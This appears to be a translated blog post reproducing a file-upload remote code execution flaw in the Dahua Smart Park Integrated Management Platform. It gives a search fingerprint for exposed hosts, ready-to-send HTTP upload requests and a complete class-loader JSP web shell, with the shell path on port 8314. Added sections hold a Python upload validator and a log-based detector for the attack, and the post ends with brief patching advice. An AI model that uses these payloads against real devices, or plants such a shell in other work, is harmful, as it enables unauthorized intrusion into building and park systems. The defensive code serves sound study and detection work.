Dahua Smart Park Integrated Management Platform RCE Vulnerability Reproduction (0day)

0x01 Product Introduction

"Dahua Smart Park Integrated Management Platform" is a comprehensive management platform with functions such as park operation, resource allocation, and intelligent services. The platform is intended to help optimize the allocation of park resources to meet diversified management needs, and at the same time to enhance the user experience by providing intelligent services.

0x02 Vulnerability Overview

The Dahua Smart Park device exposes a file upload function but does not strictly restrict or filter the type, size, format or path of the uploaded file. An attacker can therefore craft a malicious file, upload it to the device, and use this vulnerability to gain privileges and execute arbitrary commands.

0x03 Reproduction Environment

Hunter (鹰图) asset fingerprint: web.body="/WPMS/asset/lib/gridster/"

0x04 Vulnerability Reproduction

Hosts matching the fingerprint above are affected.

PoC

POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0

--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
Content-Disposition: form-data; name="upload"; filename="a.jsp"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary

test123
--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT--

Send the upload request. The response echoes the stored JSP file name.

Verification URL:

http://ip:8314/upload/emap/society_new/<jsp-filename-echoed-in-response>

Note: after the file is uploaded, the port is redirected to port 8314, so the verification URL uses 8314 rather than the port the upload was sent to.
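The overview above lists the checks that are missing on the upload endpoint (type, size, format, path). The following Python code is an added illustration of what those checks look like; it is not code from the original post or from the Dahua platform. It parses a multipart body shaped like the PoC request and applies the policy an icon-upload endpoint should enforce: an extension allowlist, a magic-byte check that the content really is the declared image type, a size limit, and a random server-side file name so the client-supplied name never reaches the filesystem. The set of allowed image types, the size limit, and the names `build_body`, `parse_multipart` and `validate_upload` are assumptions made for this example.

```python
import os
import re
import secrets

# Boundary copied from the PoC request above; the bodies built here are constructed test input.
BOUNDARY = "A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT"

# Assumption: an icon-upload endpoint should only ever accept these image types.
# Each extension is paired with the magic bytes the file content must start with.
ALLOWED_TYPES = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}
MAX_UPLOAD_BYTES = 512 * 1024  # assumed limit for an icon


def build_body(filename: str, data: bytes, boundary: str = BOUNDARY) -> bytes:
    """Build a one-part multipart/form-data body in the same shape as the PoC (constructed input)."""
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="upload"; filename="{filename}"\r\n'
        "Content-Type: application/octet-stream\r\n"
        "Content-Transfer-Encoding: binary\r\n\r\n"
    ).encode()
    return head + data + f"\r\n--{boundary}--\r\n".encode()


def parse_multipart(body: bytes, boundary: str) -> list:
    """Minimal multipart/form-data parser: returns a list of (headers, data) per part."""
    delimiter = b"--" + boundary.encode()
    parts = []
    for chunk in body.split(delimiter)[1:]:
        if chunk.startswith(b"--"):
            break  # closing delimiter "--boundary--"
        if chunk.startswith(b"\r\n"):
            chunk = chunk[2:]
        raw_headers, _, data = chunk.partition(b"\r\n\r\n")
        # The CRLF before the next delimiter belongs to the delimiter, not to the file.
        if data.endswith(b"\r\n"):
            data = data[:-2]
        headers = {}
        for line in raw_headers.decode("latin-1").split("\r\n"):
            name, sep, value = line.partition(":")
            if sep:
                headers[name.strip().lower()] = value.strip()
        parts.append((headers, data))
    return parts


def validate_upload(body: bytes, boundary: str) -> tuple:
    """Return (accepted, reason_or_stored_name) for a multipart upload body."""
    parts = parse_multipart(body, boundary)
    if len(parts) != 1:
        return False, "expected exactly one file part"
    headers, data = parts[0]
    match = re.search(r'filename="([^"]*)"', headers.get("content-disposition", ""))
    if not match:
        return False, "missing filename"
    # Only the extension of the client-supplied name is used; any directory part is ignored.
    ext = os.path.splitext(os.path.basename(match.group(1)))[1].lower()
    if ext not in ALLOWED_TYPES:
        return False, f"extension {ext!r} is not in the allowlist"
    if len(data) > MAX_UPLOAD_BYTES:
        return False, "file too large"
    if not data.startswith(ALLOWED_TYPES[ext]):
        return False, "content does not match the declared image type"
    # Random server-side name: the client never chooses where or under what name the file lands.
    # Assumption: the target directory is outside the webroot and never handled by the JSP engine.
    return True, secrets.token_hex(16) + ext


if __name__ == "__main__":
    print(validate_upload(build_body("a.jsp", b"test123"), BOUNDARY))
    print(validate_upload(build_body("icon.png", ALLOWED_TYPES[".png"] + b"\x00" * 16), BOUNDARY))
```

With this policy the PoC body (filename a.jsp, content test123) is rejected at the extension check, a JSP payload renamed to .png is rejected at the magic-byte check, and a path in the client filename has no effect on where the file is stored.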

Upload the JSP payload:

POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0

--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
Content-Disposition: form-data; name="upload"; filename="b.jsp"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary

<%!
    class U extends ClassLoader {
        U(ClassLoader c) {
            super(c);
        }
        public Class g(byte[] b) {
            return super.defineClass(b, 0, b.length);
        }
    }
 
    public byte[] base64Decode(String str) throws Exception {
        try {
            Class clazz = Class.forName("sun.misc.BASE64Decoder");
            return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
        } catch (Exception e) {
            Class clazz = Class.forName("java.util.Base64");
            Object decoder = clazz.getMethod("getDecoder").invoke(null);
            return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
        }
    }
%>
<%
    String cls = request.getParameter("passwd");
    if (cls != null) {
        new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
    }
%>
--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT--

Try to connect to the uploaded file.
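For defenders, the steps above leave a recognisable trace in the web server access log: a POST to /emap/devicePoint_addImgIco followed, from the same client, by a request for a .jsp file under /upload/emap/society_new/. The script below is an added illustration, not part of the original post or of any Dahua tooling. It parses constructed combined-format log lines, raises a high-severity alert for any JSP requested from the upload directory, correlates it with a preceding upload from the same client, and includes a content heuristic for the class-loader style JSP shown above (a ClassLoader subclass calling defineClass on data taken from a request parameter) to triage files already found under the upload directory. The log format, the IP addresses and timestamps, the correlation window and the function names are assumptions made for this example.

```python
import re
from datetime import datetime, timedelta

UPLOAD_ENDPOINT = "/emap/devicePoint_addImgIco"   # upload endpoint from the write-up
SERVED_UPLOAD_DIR = "/upload/emap/society_new/"   # directory the uploaded file is served from

# Combined log format: client, [timestamp], "METHOD PATH PROTO", status. Assumed format for the example.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample lines: addresses, times and sizes are invented for the example.
SAMPLE_LOG = """\
10.0.0.7 - - [17/Jul/2023:10:00:40 +0800] "GET /WPMS/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.5 - - [17/Jul/2023:10:01:02 +0800] "POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1" 200 160 "-" "Mozilla/5.0"
10.0.0.7 - - [17/Jul/2023:10:01:05 +0800] "POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1" 200 160 "-" "Mozilla/5.0"
10.0.0.5 - - [17/Jul/2023:10:01:09 +0800] "GET /upload/emap/society_new/b.jsp HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.0.0.7 - - [17/Jul/2023:10:01:12 +0800] "GET /upload/emap/society_new/icon.png HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""


def parse_line(line: str):
    """Parse one combined-format access log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%d/%b/%Y:%H:%M:%S %z")
    ev["path"] = ev["path"].split("?", 1)[0]  # drop the query string (hasSubsystem=true in the PoC)
    return ev


def detect(lines, window: timedelta = timedelta(minutes=10)) -> list:
    """Return alerts as (severity, client_ip, description) tuples, in log order."""
    alerts = []
    last_upload = {}  # client ip -> timestamp of its most recent POST to the upload endpoint
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        if ev["method"] == "POST" and ev["path"] == UPLOAD_ENDPOINT:
            last_upload[ev["ip"]] = ev["ts"]
            alerts.append(("info", ev["ip"], "file upload via " + UPLOAD_ENDPOINT))
        elif ev["path"].startswith(SERVED_UPLOAD_DIR) and ev["path"].lower().endswith((".jsp", ".jspx")):
            # Nothing executable should ever be served from the upload directory.
            alerts.append(("high", ev["ip"], "JSP requested from upload directory: " + ev["path"]))
            uploaded_at = last_upload.get(ev["ip"])
            if uploaded_at is not None and ev["ts"] - uploaded_at <= window:
                alerts.append(("critical", ev["ip"], "upload followed by JSP execution within window"))
    return alerts


# Indicators of the class-loader style JSP shown in the write-up: a ClassLoader subclass,
# a defineClass call, and class bytes taken from a request parameter. All three must be present.
SHELL_INDICATORS = ("extends ClassLoader", "defineClass", "request.getParameter")


def looks_like_classloader_shell(jsp_source: str) -> bool:
    """Heuristic for triaging JSP files found under the upload directory."""
    return all(indicator in jsp_source for indicator in SHELL_INDICATORS)


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG.splitlines()):
        print(alert)
```

Because the uploaded file is served on port 8314, the GET for the .jsp may be recorded by a different service than the one that logged the POST; feed both logs to `detect` so the correlation can fire. The content heuristic is deliberately narrow and only flags the pattern seen on this page; it is a triage aid for incident response, not a substitute for removing the upload directory from the JSP engine's reach.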

0x05 Remediation Suggestions

Users of the affected system are advised to apply patches as soon as possible, restrict access sources, and avoid exposing the Dahua Smart Park integrated management platform to the public internet or other insecure network environments.


Source: blog.csdn.net/qq_41904294/article/details/131740622